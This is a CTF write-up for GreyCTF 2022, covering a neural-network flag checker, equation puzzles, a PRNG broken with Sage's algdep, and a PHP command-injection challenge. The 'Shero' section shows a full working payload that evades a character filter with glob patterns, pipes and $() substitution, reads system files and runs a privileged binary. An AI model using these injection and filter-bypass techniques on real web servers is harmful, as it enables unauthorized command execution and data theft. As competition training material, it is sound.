GreyCTF writeups

Logical Computers, Equations, Catino, Shero

Java

2022-06-11

cyber

python, writeup

Challenges and thoughts

Logical Computers
Blooded this challenge, was nice.

Permutation
Another DLP challenge, third one this week. Relatively simple, so no writeup.

Equation & Equation 2
meme

Catino
Probably could have figured out the LLL solution if I used my brain more, luckily we found a sage function to do it for us.

Shero
I’m not a web guy, but this challenge was fun. This is not to say I didn’t lose a few years of my lifespan doing it, but it was fun.

Logical Computers

23 Solves
Teaching computers is like teaching children, you gotta start simple. Today I taught it to recognize the flag!

Setup

We’re given a PyTorch (based) model:

def step_activation(self, x : torch.Tensor) -> torch.Tensor:
    x[x <= 0] = -1
    x[x >  0] = 1
    return x

def forward(self, x : torch.Tensor) -> int:
    x = self.layer1(x)
    x = self.step_activation(x)
    x = self.layer2(x)
    x = self.step_activation(x)
    return int(x)

And we’re told that upon inputting the flag, it outputs 1.

in_data = tensorize(flag)
in_dim	= len(in_data)
model = NeuralNetwork(in_dim, 1280)
model.load_state_dict(torch.load("model.pth"))

if model(in_data) == 1:
	print("Yay correct! That's the flag!")
else:
	print("Awww no...")

While not directly stated, we can derive the length of the flag by looking at the shape of the first weight:

1 2	model.layer1.weight.shape # torch.Size([1280, 160])

160 bits, indicating a length of 20.

First look

This CTF was run right after SEETF, and so my mind was still primed to one challenge, Neutrality, where I had solved it by “training” the input to an objective. I hence attempted to do the same here.

First, I swapped out the step_activation definition for a tanh, which has roughly the same properties, but is continuous, and more importantly, has a useful gradient:

1 2	def step_activation(self, x : torch.Tensor) -> torch.Tensor: return torch.tanh(x)

And from there, attempted to train an input to maximise the output (corresponding to the flag). Sadly, this didn’t work. ~~While I didn’t spend too long digging for why (there was still a possible first blood!), I believe that part of the reason is gradient vanishing.~~

Noting the far off regions of the function. They’re nearly flat, which makes it difficult for gradient based optimisers to work. In the case of this model, it would make sense that the pre-activation values were on some extreme, after all, it makes no difference with the step function, and hence is easier to make.

EDIT 6/12/2022: After looking at it again, I did indeed backprop it successfully! I just interpreted the bits incorrectly (Used the same method as Neutrality, which is wrong). Not sure how the blood didn’t get sniped, but I’m not complaining.

Looking at the weights and biases

Let’s actually do the challenge now.

Looking at the linear layer’s weights and biases:

model.layer1.weight
# tensor([[0., 1., 1.,  ..., 1., 1., 0.],
#        [0., 1., 0.,  ..., 0., 0., 0.],
#        [0., 0., 0.,  ..., 1., 1., 0.],
#        ...,
#        [0., 0., 0.,  ..., 0., 0., 0.],
#        [1., 0., 0.,  ..., 0., 1., 0.],
#        [0., 0., 0.,  ..., 0., 0., 0.]])

1 2	model.layer1.bias # tensor([-42., -4., -20., ..., -3., -20., -4.])

1 2	model.layer2.weight # tensor([[ 1., -1., 1., ..., -1., 1., 1.]])

1 2	model.layer2.bias # tensor([-1279.])

Hidden layer

We can observe something interesting about the second layer’s bias. It’s exactly equal to -(hidden dimention - 1). This, together with the fact that the previous layer consists of only $-1$ and $1$, implies that the only way for the neuron to be activated would be for all weight * hidden node to be 1, making for $1280 - 1279 = 1$. Hence, the hidden nodes need to match the weights of layer 2, either $1 \cdot 1 = 1$, or $-1 \cdot -1 = 1$. With that in mind, we now know our targets for the hidden nodes.

Input layer

We can do something similar to work our way to the input layer. It’s likely that the weights in layer1 will have something similar going on to the weights in layer2, and indeed:

1 2	model.layer1.weight.sum(axis=1) # tensor([43., 5., 21., ..., 4., 21., 5.])

1 2	model.layer1.bias # tensor([-42., -4., -20., ..., -3., -20., -4.])

This time, the weights are $0$ or $1$ only. A weight of $0$ indicates that the neurons are effectively disconnected.

The bias is again -(connected neurons - 1), indicating that it’s only activated if all of it’s connected neurons are activated. In other words,
$$
I_0 \land I_1 \land\ …\ \iff H
$$
And importantly, we can reverse the implication: If all hidden neurons that are connected to given input neuron are activated, this particular input neuron must have been activated.
$$
{
\begin{align}
&H_0 \ \land && && I\ \land I_{00}\land\ …\ \land \\
&H_1 \ \land &&\implies && I\ \land I_{10}\land\ …\ \land \implies I\ \land\ (\ \ldots\ ) \\
&H_2 && && I\ \land I_{20}\land\ …
\end{align}
}
$$
In this case, $H$ being activated means its output is $1$. Hence, if we select just the weights that connect to active neurons, and find that there exists a connection from it to an input neuron, this input neuron must be active. If there are no connections between an input neuron to any active hidden neuron, we can be certain that it’s not active.

model.layer1.weight[model.layer2.weight[0] == 0].sum(axis=0)
# tensor([258., 251., 236.,   0.,   0., 245., 254.,   0.,   0., 254.,   0.,   0.,
#        227., 260., 234.,   0., 238.,   0., 259.,   0.,   0., 257., 244.,   0.,
#        263.,   0.,   0., 256., 250., 242., 257.,   0., 265., 240.,   0., 233.,
#        266., 233., 239.,   0., 244., 252.,   0.,   0., 253., 279., 272.,   0.,
#        264.,   0., 258., 263.,   0.,   0., 246.,   0.,   0.,   0.,   0.,   0.,
#        244., 246.,   0.,   0.,   0., 244.,   0.,   0., 229., 271., 254.,   0.,
#          0.,   0., 264.,   0., 274.,   0., 248.,   0., 238., 252., 233., 241.,
#        237.,   0., 251.,   0., 252.,   0., 238., 222.,   0., 263., 271.,   0.,
#        263.,   0.,   0.,   0.,   0.,   0., 234.,   0., 238., 225.,   0.,   0.,
#          0., 232., 257.,   0.,   0.,   0.,   0., 249.,   0., 246., 242.,   0.,
#        232.,   0.,   0.,   0., 248., 247.,   0.,   0.,   0., 258., 251., 267.,
#          0., 228., 253.,   0., 262.,   0., 245.,   0.,   0.,   0., 261.,   0.,
#        247.,   0., 253.,   0., 244., 255.,   0.,   0., 249.,   0., 241., 233.,
#        245., 266., 229.,   0.])

$0$s correspond to input neurons with no connections to any active hidden neurons. Hence, we have our input:

2 * (model.layer1.weight[l2w>0].sum(axis=0)>1) - 1.0
# tensor([ 1.,  1.,  1., -1., -1.,  1.,  1., -1., -1.,  1., -1., -1.,  1.,  1.,
#          1., -1.,  1., -1.,  1., -1., -1.,  1.,  1., -1.,  1., -1., -1.,  1.,
#          1.,  1.,  1., -1.,  1.,  1., -1.,  1.,  1.,  1.,  1., -1.,  1.,  1.,
#         -1., -1.,  1.,  1.,  1., -1.,  1., -1.,  1.,  1., -1., -1.,  1., -1.,
#         -1., -1., -1., -1.,  1.,  1., -1., -1., -1.,  1., -1., -1.,  1.,  1.,
#          1., -1., -1., -1.,  1., -1.,  1., -1.,  1., -1.,  1.,  1.,  1.,  1.,
#          1., -1.,  1., -1.,  1., -1.,  1.,  1., -1.,  1.,  1., -1.,  1., -1.,
#         -1., -1., -1., -1.,  1., -1.,  1.,  1., -1., -1., -1.,  1.,  1., -1.,
#         -1., -1., -1.,  1., -1.,  1.,  1., -1.,  1., -1., -1., -1.,  1.,  1.,
#         -1., -1., -1.,  1.,  1.,  1., -1.,  1.,  1., -1.,  1., -1.,  1., -1.,
#         -1., -1.,  1., -1.,  1., -1.,  1., -1.,  1.,  1., -1., -1.,  1., -1.,
#          1.,  1.,  1.,  1.,  1., -1.])

Now, we simply need to un-tensorize it into the flag:

def untensorize(x):
    x = x.detach().numpy()
    x = (x > 0).tolist()[::-1]
    x = "".join("1" if y else "0" for y in x)
    x = int(x, 2)
    return bytes.fromhex(hex(x)[2:])[::-1]
    
untensorize( ... )
# b'grey{sM0rT_mAch1nE5}'

Equation & Equation 2

Equation

Notice that there is a dominant term in both expressions. In the second equation, $m_1^5 \gg 7m_2^3$, so $m_1 \approx \sqrt[5]{168 \ldots}$ and from there, $m2$ is evident.

f1 = 656...
f2 = 168...

m1 = int(f2^(1/5))
m2 = ((f2-m1^5)/7).nth_root(3)

print(bytes.fromhex(hex(m1)[2:]))
print(bytes.fromhex(hex(m2)[2:]))

# b'grey{solving_equation_aint_th'
# b'at_hard_rite_gum0pX6XzA5PJuro}'

Equation 2

No comment

Catino

Setup

We’re given a PRNG where the output digits are the fractional parts of a random 2048 bit number’s fourth root. For instance, if the number was 4, then the PRNG would output 41421356..., since $4^{1/4} = \sqrt2 \approx 1.41421356$.

We can guess the next PRNG output, and each time the server will tell us if we were correct. We need to get 100 correct digits in a row, with a cap at 5000 tries.

Ideas

Let the random number be $r$, fractional part be $f$, and integer part be $n$. We have the following relation:
$$
r = (f+n)^4
$$
Which means $f$ is a root to the polynomial
$$
(x+n)^4 - r =\
x^4 + 4x^3n + 6x^2n^2 + 4xn^3 + n^4 - r
$$
With some* searching, we found sage’s algdep, which could help find this polynomial. And hence,

nums = "42500023301351455032..."

s = len(nums)
R = RealField(int(log(10^s, 2))+10)

f = R(nums) / 10^(len(nums))
poly = algdep(f, 4)

assert poly[4] == 1

n = poly[3]//4
r = n^4 - poly[0] 

R = RealField(20000)
print(frac(R(r)^(1/4)))

Despite this, we found it to be quite finnicky. The first RealField has to be of a similar precision to the decimal from the PRNG, else it would fail. When it fails, often the coefficient of $x^4$ isn’t $1$, hence the assertation.

*2 days

Shero

11 Solves
We like cat, so don’t abuse it please =(

Setup

We have a php script, which runs cat <input> given that it doesn’t match the regex.

 <?php
    $file = $_GET['f'];
    if (!$file) highlight_file(__FILE__);

    if (preg_match('#[^.cat!? /\|\-\[\]\(\)\$]#', $file)) {
        die("cat only");
    }

    if (isset($file)) {
        system("cat " . $file);
    }
?>

preg_match

We had a few failed first attempts trying to bypass the regex. The first idea is based on the fact that preg_match sometimes only matches the first line of input. Running a command like

1 2	cat a;\ cat /etc/passwd

Could hence fail to match the second line, bypassing the regex. Unfortunately, we don’t have a ^ ... $ regex here, we had a [] group, which has no such problem.

There was also the possibility that passing a non-string datatype to preg_match would, instead of raising an error, simply emit a warning and return false. Then the concatenation with the string would allow the true payload to be run. Sadly, preg_match does raise an error. It only emits a warning if the pattern is invalid.

The regex

Taking a look at the regex in Regexr,

The regex works by attempting to find a character not found in the given set. If found, it returns 1, and hence the die branch is run. Hence, if our string only contains the characters

1	.cat!? /\|-[]()$

Then it’s happy to run it.

glob & bash

Apart from cat, the remaining characters we have to work with are a subset of the glob characters. For instance, in a directory:

.
├── def.txt
└── xyz
    ├── abc.txt
    └── abcde

Then the command

1	cat */.txt

Would output

1 2	contents of def.txt contents of xyz/abc.txt

And the command

1	cat /abc

Would output

1 2	contents of xyz/abc.txt contents of xyz/abcde

We can use this to our advantage. There are a few more glob syntaxes that we’ll use later on, but I’ll introduce them as they come along.

Additionally, we have $() at our disposal, allowing us to use the output of one command as part of another. For example:

1	echo "It's now $(date)"

Would evaluate date, and use its result in echo:

1	It's now Sat Jun 11 19:12:44 +08 2022.

Commands

Running commands on the server

One thing to note is that we can run any command (that matches the regex) we want by doing:

1	http://challs.nusgreyhats.org:12325/?f=a\|cmd

which is run as

1	cat a\| cmd

While cat a fails (due to there being no file a), the output is piped into cmd, which thus runs.

Globbing commands

The first thing we might want to do is look around. For this, we’d need to somehow run ls or dir. These binaries should be in /bin/.

On your local system, doing

1	find /bin -name '???'

Will show the files matching the pattern ???. (? means any character) There are many, so I won’t show it here. Running the glob /bin/??? hence won’t cut it. We need to filter it down more. Let’s start being more specific with our matching using character sets, [].

If you recall from the regex, [] in essence, means “match a character in this set”. It works the same with glob. The main patterns we’ll be using are:

[abc] # match a, b, or c
[x-z] # match anything between x and z (x,y,z)
[-x] # match anything before x
[! abc] # don't match a,b,c

With a little trail and error, we see that

1	/[a-c]??/[!c]??

Matches /bin/dir, and outputs

1	/bin/pwd /bin/sed /bin/tar

Now, if we want, we can dir any directory! For instance, the root directory:

1	/[a-c]??/[!c]?? /

Looks like this:

1
2
3

/:
bin dev flag.txt lib media opt readflag run srv tmp var
boot etc home lib64 mnt proc root sbin sys usr

readflag & flag.txt

Now, interestingly, there seem to be two important files in the root directory: flag.txt, and readflag.

Let’s try to cat flat.txt. As before, we need to match it with a glob. With the help of /bin/dir, we can run

1	/bin/dir /??a?.t?t

Which only outputs/flag.txt, indicating that our glob only matches flag.txt.cating /??a?.t?t, however, seems to output nothing. Perhaps we don’t have the permissions.

1	f = /??a?.t?t

(empty)

Let’s try again on readflag (/??a???a?), and this time, it outputs:

1	f = /??a???a?

1
2

ELF>�@`:@8@@@@hh�����-- ���-�=�=px�-�=�=�����DDP�tdT T T <<Q�tdR�td�-�=�=/lib64/ld-linux-x86-64.so.2GNU���X)�EP�7����'��GNU��e�m^ 6/z � "fopenputsprintffget
...

Which is an executable! Let’s try to run it:

1	f = a\| /??a???a?

1	Password requried!

Hmm.

With the help of your local rev-er, they can tell you that this executable has the permissions to view flag.txt, and prints it. However, it only does so if you input the correct password, sRPd45w_0. You can test this by saving the ELF locally, and running the command

1	./readflag sRPd45w_0

Which will print the contents of flag.txt.

Getting characters

Supposing we could find an expression that evaluates to each of the required characters, then getting the flag would be easy. All we need to do is to run

1	./readflag $(evals to s)$(evals to R)...$(evals to 0)

One of the first ideas we had was to cat out a file’s contents, then extract out the needed characters. We also had another idea that uses a Base64 encoding of characters, but again it would require extraction of needed characters. Let’s first look at that.

Extracting

We quickly figured out that there was a command, cut, that could help us with extracting chars.

cat def.txt
# contents of def.txt
# 12345678

cut -c 5 def.txt
# e

Critically, the option -c uses allowed characters. While -b works similarly, b isn’t allowed, and since this is the method in which we’re using to extract arbitrary characters, we can’t use it.

But wait, how do we get 5? This was yet another road block, but we figured that if we could somehow get the length of an arbitrary string, we’d be set. Sadly, there’s no command length.

However, we did find a method here:

1 2	echo cccc \| wc -c # 5

Which again, luckily uses -c. Note that it’s one more than the number of cs, because there’s a hidden newline. We never had to get a 0 character, so this was fine with us. Had we needed to, though, we could have extracted the second character from a number like 100.

With that, we can continue to the final steps.

Base64

We knew that a command like

1 2	echo cta \| base64 # Y3RhCg==

would sometimes output useful characters, such as in this case, R. Using a direct search of all 3 character sequences containing .cat!?$, we found that RPd450 were possible through this method, short of sw_. For reference, the following expression evaluates to R:

1	echo cta \| base64 \| wc -c 3

Which then is represented as:

1
2
3

/[a-c]??/[a-t]c[!a]? cta | 
/???/[a-c]??/[a-c]a???$(/[a-c]??/[a-t]c[!a]? ccc | /???/[a-c]??/[!c]c -c) | 
/???/[a-c]??/c?t -c $(/[a-c]??/[a-t]c[!a]? cc | /???/[a-c]??/[!c]c -c)

File catting

We still were missing sw_. We decided to start looking for files that could possibly contain them, which we could then do.

1	cat file \| wc -c N

After some searching, we found /etc/netconfig, which contained _ and s, and /etc/mtab, which contained w.

1	cat /?tc/??tc????? # netconfig

...
tcp6 tpi_cots_ord v inet6 tcp - -
rawip tpi_raw - inet - - -
local tpi_cots_ord - loopback - - -
unix tpi_cots_ord - loopback - - -

If you’re eagle eyed, you might have spotted the w in the second line. Why didn’t we use it? Well, cut has a caveat. It’s meant for processing many lines of data, and hence, -c actually specifies which character to extract on each line. For instance,

cat example
123
456
789

cut -c 2 exa
2
5
8

Which means that the multi-line outputs we found couldn’t be used directly. We worked around this issue by using tail with the -c (again) option, which specifies the number of characters to extract from the back. This allowed us to index the last line easily, but nothing else. /etc/netconfig contains s and _ on the final line, similar to /etc/mtab and c. Putting it all together, this expression evaluates to _:

1	cat /etc/netconfig \| /usr/etc/tail -c 44 \| cut -c 1

Which is represented as:

1
2
3

/???/cat /?tc/??tc????? | 
/???/[a-c][c-t]?/ta[c-t]? -c $(/[a-c]??/[a-t]c[!a]? ccccccccccccccccccccccccccccccccccccccccccc | /???/[a-c]??/[!c]c -c) | 
/???/[a-c]??/c?t -c $(/[a-c]??/[a-t]c[!a]? | /???/[a-c]??/[!c]c -c)

Finale

And with that, we have what we needed. This is the full breakdown of the command:

/readflag sRPd45w_0

readflag : /??a???a?
RPd450   : echo ? | base64 | cut -c N
sw_      : cat ? | tail -c N | cut -c N

base64   : /???/[a-c]??/[a-c]a???4

number   : echo {N-1 'c's} | wc -c 

echo     : /[a-c]??/[a-t]c[!a]?
tail     : /???/[a-c][c-t]?/ta[c-t]?
wc       : /???/[a-c]??/[!c]c
cut      : /???/[a-c]??/c?t
cat      : /???/cat

The expanded,1738 long f is pasted below.

a| /??a???a? $(/???/cat /?tc/??tc????? | /???/[a-c][c-t]?/ta[c-t]? -c $(/[a-c]??/[a-t]c[!a]? ccccccccccccccccccccccccccccccccccccccc | /???/[a-c]??/[!c]c -c) | /???/[a-c]??/c?t -c $(/[a-c]??/[a-t]c[!a]?  | /???/[a-c]??/[!c]c -c))$(/[a-c]??/[a-t]c[!a]?%20cta%20|%20/???/[a-c]??/[a-c]a???$(/[a-c]??/[a-t]c[!a]?%20ccc%20|%20/???/[a-c]??/[!c]c%20-c)%20|%20/???/[a-c]??/c?t%20-c%20$(/[a-c]??/[a-t]c[!a]?%20cc%20|%20/???/[a-c]??/[!c]c%20-c))$(/[a-c]??/[a-t]c[!a]? ?ca | /???/[a-c]??/[a-c]a???$(/[a-c]??/[a-t]c[!a]? ccc | /???/[a-c]??/[!c]c -c) | /???/[a-c]??/c?t -c $(/[a-c]??/[a-t]c[!a]?  | /???/[a-c]??/[!c]c -c))$(/[a-c]??/[a-t]c[!a]? tca | /???/[a-c]??/[a-c]a???$(/[a-c]??/[a-t]c[!a]? ccc | /???/[a-c]??/[!c]c -c) | /???/[a-c]??/c?t -c $(/[a-c]??/[a-t]c[!a]?  | /???/[a-c]??/[!c]c -c))$(/[a-c]??/[a-t]c[!a]? c.$ | /???/[a-c]??/[a-c]a???$(/[a-c]??/[a-t]c[!a]? ccc | /???/[a-c]??/[!c]c -c) | /???/[a-c]??/c?t -c $(/[a-c]??/[a-t]c[!a]? cc | /???/[a-c]??/[!c]c -c))$(/[a-c]??/[a-t]c[!a]? c.a | /???/[a-c]??/[a-c]a???$(/[a-c]??/[a-t]c[!a]? ccc | /???/[a-c]??/[!c]c -c) | /???/[a-c]??/c?t -c $(/[a-c]??/[a-t]c[!a]? cc | /???/[a-c]??/[!c]c -c))$(/???/cat /?tc/???? | /???/[a-c][c-t]?/ta[c-t]? -c $(/[a-c]??/[a-t]c[!a]? cccccccccccccccccccccccccccccccccc | /???/[a-c]??/[!c]c -c) | /???/[a-c]??/c?t -c $(/[a-c]??/[a-t]c[!a]?  | /???/[a-c]??/[!c]c -c))$(/???/cat /?tc/??tc????? | /???/[a-c][c-t]?/ta[c-t]? -c $(/[a-c]??/[a-t]c[!a]? ccccccccccccccccccccccccccccccccccccccccccc | /???/[a-c]??/[!c]c -c) | /???/[a-c]??/c?t -c $(/[a-c]??/[a-t]c[!a]?  | /???/[a-c]??/[!c]c -c))$(/[a-c]??/[a-t]c[!a]? cat | /???/[a-c]??/[a-c]a???$(/[a-c]??/[a-t]c[!a]? ccc | /???/[a-c]??/[!c]c -c) | /???/[a-c]??/c?t -c $(/[a-c]??/[a-t]c[!a]? ccc | /???/[a-c]??/[!c]c -c))

Giving it to the server, we get our flag.